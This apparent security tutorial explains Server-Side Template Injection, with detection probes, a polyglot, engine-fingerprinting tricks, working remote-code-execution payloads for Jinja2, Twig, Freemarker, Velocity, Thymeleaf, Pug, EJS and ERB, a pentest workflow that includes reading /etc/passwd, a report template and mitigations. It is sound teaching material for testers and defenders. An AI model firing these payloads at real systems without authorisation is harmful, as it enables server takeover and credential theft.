SSTI: what Server-Side Template Injection is and how it becomes RCE

SSTI (Server-Side Template Injection) is what happens when an application concatenates user input directly into a template that is evaluated on the server. The template engine (Jinja2, Twig, Freemarker, etc.) no longer sees the input as data to be displayed — it sees it as template code to be executed. From that point on, what was a name field, an email signature, or a URL parameter becomes an arbitrary expression running in the context of the application process. Because template engines exist precisely to evaluate expressions and, in many cases, to access objects and methods of the host language, SSTI tends to escalate from “I can compute 7*7” to RCE (remote code execution) with uncomfortable ease. It is this proximity to the language that sets SSTI apart from XSS: both are markup injection, but XSS executes in the victim’s browser (client context, browser sandbox, impact on the session of whoever visits) while SSTI executes on the server (application context, file system, internal network, credentials). Same family, completely different severity.

How it works

A template engine takes a template (text with markers) and a context (a dictionary of variables) and produces a final string. When you write Hello {{ name }} and pass {"name": "Alice"}, the engine replaces {{ name }} with Alice. All good: name was treated as data.

The problem arises when the developer builds the template itself from user input. In Python/Flask with Jinja2, the difference is literally one line:

from jinja2 import Template

# SAFE — input goes in as data through the context
Template("Hello {{ name }}").render(name=user_input)

# VULNERABLE — input becomes part of the template and is evaluated
Template("Hello " + user_input).render()

In the vulnerable version, if user_input is Alice, nothing happens. But if it is {{ 7*7 }}, the engine finds a marker in the template it is itself compiling and evaluates the expression: the output becomes Hello 49. The 49 is the proof: the input was not displayed, it was executed on the server.

The root cause is always the same: confusing the template (logic, trusted) with the context (data, untrusted). Engines are designed to evaluate expressions — and many expose enough of the host language (object attributes, base classes, modules) for an expression to turn into file reads, system calls, or access to environment variables. Classic scenarios: transactional emails with a “customizable template,” error pages that echo parameters, report/invoice generators, and any endpoint that accepts “personalize your message.”

How to detect

Detecting SSTI has two stages: confirming that there is server-side evaluation and identifying which engine is behind it.

The first test is mathematical, because it is unambiguous. If the application reflects 7 but you inject an expression and it comes back as 49, there is no ambiguity — something evaluated the multiplication. The catch is that each engine family uses a different marker syntax:

{{7*7}}      → Jinja2, Twig, Nunjucks, Handlebars (double-brace syntax)
${7*7}       → Freemarker, Velocity, Thymeleaf (dollar syntax)
<%= 7*7 %>   → ERB (Ruby), EJS (Node)
#{7*7}       → Pug, and some variants

That is why pragmatism dictates using a polyglot — a single string that fires across multiple contexts at once, so you can see which syntax “stuck”:

${{<%[%'"}}%\

If something breaks, reflects a computed value, or generates a template error, you are on the trail. From there, the decision tree disambiguates engines that share syntax. The well-established trick is {{7*'7'}}, which behaves differently depending on the language’s semantics:

{{7*7}}     returns 49?         → double-brace family confirmed
{{7*'7'}}   returns 7777777?    → Jinja2 (Python: int * str repeats the string)
{{7*'7'}}   returns 49?         → Twig (PHP: '7' is coerced to an integer)

The logic is “returns X, therefore engine Y”: multiplying an integer by a string and getting the string repeated indicates Python (Jinja2); numeric coercion indicates PHP (Twig). For the dollar family, fire payloads specific to Freemarker vs Velocity vs Thymeleaf and observe which one produces a distinct output or error. Error messages also give the game away: a stack trace with jinja2.exceptions, freemarker.core, or org.thymeleaf settles the identification on the spot. Always start with generic detection (7*7), then refine with payloads that only one engine understands.

By engine

Jinja2 (Python/Flask) — the vector is to navigate the Python object hierarchy from a literal until you reach subprocess or os. Representative RCE payload:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

A classic alternative chain, starting from an empty string and climbing via __class__/__mro__/__subclasses__, is also well established when self is not accessible:

{{ ''.__class__.__mro__[1].__subclasses__() }}

Twig (PHP) — in modern versions, the map/filter filter applying a PHP function is the cleanest path. The established payload uses filter with system:

{{['id']|filter('system')}}

In legacy environments (Twig 1.x), the chain via _self still shows up:

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}

(Note that the registered filter must be the execution function, e.g. system or exec, and the filter called next is the command — id.)

Freemarker (Java) — the API exposes Execute directly, and that is why Freemarker is so exploitable:

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

Velocity (Java) — abuses reflection from any class to reach Runtime. Established payload:

#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($str=$x.class.forName('java.lang.String'))
$rt.getRuntime().exec('id')

The classic compact form also works:

#set($e="exec")$rt.getRuntime().$e("id")

(In both, what matters is obtaining java.lang.Runtime via forName and invoking getRuntime().exec(...).)

Thymeleaf (Spring) — expression preprocessing with __${...}__ forces the evaluation of SpEL, which opens up Runtime. The most established vector is via a fragment in the URL/expression:

${T(java.lang.Runtime).getRuntime().exec('id')}

In fragment preprocessing:

__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x

Pug (Node) — allows an inline JavaScript block via unescaped interpolation, so it is direct RCE:

#{global.process.mainModule.require('child_process').execSync('id')}

EJS (Node) — historically, the well-known RCE does not come from the output delimiter (which evaluates a simple expression), but rather from abusing rendering options, such as the outputFunctionName parameter. When there is control over the template/options, injection in a scriptlet runs arbitrary JS:

<% global.process.mainModule.require('child_process').execSync('id') %>

(The <%= ... %> delimiter prints the result of an expression; for arbitrary statements use <% ... %>.)

Handlebars (Node) — logic-less by design, but exploitable via manipulation of the constructor prototype to build a function and execute it (a long chain, well documented in PayloadsAllTheThings; the trigger is reaching require('child_process')).

ERB (Ruby) — the scriptlet evaluates pure Ruby. The established forms:

<%= `id` %>

Or, equivalently: <%= system("id") %> / <%= IO.popen('id').read %>.

How we exploit it in a pentest

The flow is always the same, and discipline matters as much as the payload:

Detect. Inject {{7*7}}, ${7*7}, and <%= 7*7 %> at every reflected point. Look for 49, anomalous behavior, or a template error. In blind cases (no direct reflection), use payloads that trigger a delay or out-of-band interaction to confirm server-side evaluation.
Identify the engine. Apply the decision tree: {{7*'7'}} to separate Jinja2 (7777777) from Twig (49); $-family payloads for Freemarker/Velocity/Thymeleaf; carefully read any stack trace, which usually names the engine outright.
Bypass the sandbox / escalate. Several engines run in a sandbox (Jinja2 SandboxedEnvironment, Twig’s sandbox, restricted SpEL). The work here is finding the object chain that escapes it: climbing from a literal to __globals__/__builtins__ in Python, reaching Runtime via reflection in Java, or getting to child_process in Node. This is the step that most requires engine-specific knowledge.
File read or RCE. Before going for RCE, file reading often already proves critical impact with less noise — reading /etc/passwd or a config file with credentials demonstrates filesystem access without running any process.
Demonstrate impact — with a harmless command. RCE proof must use non-destructive and idempotent commands: id, whoami, hostname, uname -a. Never run anything that changes state, deletes data, or exfiltrates real client information. The goal is to evidence capability, not to cause harm.

Evidence best practices: capture the full request and the response with the command output; record the exact payload, the timestamp, and the user/context under which the code ran (the output of id already gives you that). If there is file reading, prefer a predictable system file (/etc/passwd) over rummaging through sensitive client data. Document the identified engine and version, because that drives the remediation. The entire chain — from 7*7 to id — must be reproducible in the report.

Report summary

Impact: Remote code execution on the application server via injection into a server-side evaluated template, with access to the file system, environment variables/credentials, and the internal network. Severity: Critical. CVSS 4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H (subsequent scope/systems set to High due to the ability to pivot into the internal network; adjust SC/SI/SA to N if the segment does not allow lateral movement). Preconditions: User input concatenated/interpolated into the template body (instead of passed as a context variable); engine without an effective sandbox or with a known bypass. Evidence: Payload {{7*7}} returned 49 (server-side evaluation confirmed); {{7*'7'}} returned 7777777 (Jinja2); execution of id returned the identity of the application process. Requests, responses, and timestamps attached.

How to mitigate

The golden rule is to never treat user input as a template. Input is data; it enters through the context, not through the template body:

from jinja2 import Template

# UNSAFE — input controls the template structure
def render_unsafe(user_input):
    return Template("Hello " + user_input).render()

# SAFE — template is fixed, input goes in as a context variable
TEMPLATE = Template("Hello {{ name }}")

def render_safe(user_input):
    return TEMPLATE.render(name=user_input)

In the safe case, {{ 7*7 }} in user_input is rendered literally as the text {{ 7*7 }}, because the engine only evaluates markers that were already in the fixed template — the context data is never reinterpreted as template.

Other controls:

Logic-less templates. Prefer engines/modes that separate data from logic by design (Mustache, Handlebars in restricted mode). Less expressiveness in the template, less attack surface.
Never render user-controlled templates. If the product requires “customizable templates” by the client, this is a maximum-risk feature — treat it as third-party code executing on your server.
Know the sandbox’s real limits. Jinja2 SandboxedEnvironment, Twig’s sandbox, and restricted SpEL help, but they have historical bypasses. A sandbox is defense in depth, not the primary defense. Do not rely on it to contain hostile input.
Separate data from logic. User input always as an argument to render(...), never via string concatenation in the template.
Allowlist. If the user needs to choose a template, offer a closed list of pre-approved templates on the server — they select by ID, they do not supply the content.
Keep the engine up to date. Many sandbox bypasses are fixed in later versions; running an old version reopens vectors that were already closed.

Mitigation checklist

Ensure no user input is concatenated/interpolated into a template body
Pass all input exclusively as a context variable in render()
Eliminate any user-controlled “customizable template” feature or isolate it strongly
Prefer logic-less templates when the use case allows
Use an allowlist of pre-approved templates (selection by ID, not by content)
Enable the engine’s sandbox mode as defense in depth — without relying on it as the only barrier
Keep the template engine on the latest version and track bypass CVEs
Add tests that inject {{7*7}}/${7*7} and validate that the output is literal, not 49

SSTI is one of those bugs where the difference between secure and critical fits in a single line of code — the boundary between passing input as data and letting it become template. Treat the template as logic and data as data, and the entire class of vulnerability disappears. To test payloads by engine without memorizing chains, use our interactive SSTI cheatsheet; and, since SSTI and XSS belong to the same injection family that changes everything depending on where the code runs, it is worth comparing with the XSS guide.